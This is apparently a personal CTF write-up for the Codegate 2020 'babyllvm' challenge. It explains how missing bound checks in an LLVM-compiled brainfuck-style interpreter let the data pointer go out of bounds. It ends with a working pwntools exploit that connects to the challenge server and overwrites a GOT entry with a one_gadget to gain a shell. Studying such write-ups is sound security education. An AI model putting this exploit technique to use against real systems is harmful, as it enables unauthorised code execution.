---
title: babyllvm
---

I recently competed in [Codegate CTF 2020](https://ctftime.org/event/938) under the junior category. This was the one of the more interesting challenges that I solved.

### Summary

This was more of a reversing problem than pwn. The llvm served only to obfuscated the code, as opposed to raising any challenges itself. 

### Analysis

Three observations are needed to solve the problem. 

1. The data pointer can be out of bounds after a codeblock finishes executing.
2. During branched execution, the security checks don't ever get called. 3.  
3. During linear execution, ptrBoundCheck won't get called if you don't adjust rel_pos. 

<!--more-->


#### Observation 1

During linear execution, the opcode 1 lacks checks on the data pointer location. 

```python
elif op == 1:
  if imm != 0:
    ori = builder.ptrtoint(builder.load(dptr_ptr), i64)
    incr = llvmIR.Constant(i64, imm)
    new = builder.inttoptr(builder.add(ori, incr), i8_ptr)
    builder.store(new, dptr_ptr)
    rel_pos += imm
```

This directly stores the value of `dptr + imm` into `dptr`. Crucially, this means that the data pointer could point to out of bounds code after execution of a codeblock. 

#### Observation 2

Note that after one branching, the code is generated as 
```python
br1b = self.br1.codegen(module, (0, 0))
br2b = self.br2.codegen(module, (0, 0))
```

This passes in `(0, 0)` as the whitelist. If `br1` has additional branching, the check will never evaluate to true because whitelist will always be `(0, 0)` for non-linear code pieces.

```python
if not is_safe(0, whitelist):
  ...
  builder.call(ptrBoundCheck, [start, bound, cur])
```

#### Observation 3

As before, recall that the whitelist is set as `(0, 0)` by default. 

If `rel_pos` is equal to zero, then the security checks will never be called. 
```python
if not is_safe(rel_pos, whitelist_cpy):
  ...
  builder.call(ptrBoundCheck, [start, bound, cur])
```

If the data pointer points to out of bounds memory at the start of execution of the codeblock, we will be able to execute instructions on it!

#### Exploit

Combining these three observations, we can easily create an exploit. For example, consider the following block of code. 

```python
builder.position_at_end(resolveRight(headb)) # data_ptr = -1
if not is_safe(0, whitelist): # Never gets called
  ...
...
builder.cbranch(cond, resolveLeft(br2b), resolveLeft(br1b)) # do something with memory[-1]
```

For example, you could get a leak with `<<<[-.]`. 
```
head: <<<
left: -.
right: [Empty]
```

This would shift the data pointer 3 bytes left, and then repeatedly subtract and print until the data pointer becomes zero. 

We don't actually need a leak however, as all of our operations are relative. Because only partial relro is enabled, we can simply shift a GOT entry in `runtime.so` to a one_gadget. 

### Final Exploit

The final exploit is actually quite short. Most of the work was done constructing the three observations, hence it being more of a reversing problem than pwn. 

```python
from pwn import *

if "--remote" in sys.argv:
  p = remote("58.229.240.181", 7777)
else:
  #p = process(["python3", "main.py"])
  p = remote("localhost", 7777)

off = 0x40

p.sendlineafter(">>>", "[]" + "<" * 0x78 + "[" + "+" * (0x8c - 0x40) + ">" * off + "]"
  + "<" * (off - 1) + "[" + "+" * (0xc3 - 0x21) + ">" * off + "]"
  + "<" * (off - 1) + "[" + "-" * (0x44 - 0x43) + ">" * off + "]"
  )

p.sendlineafter(">>>", ".")


p.interactive()
```
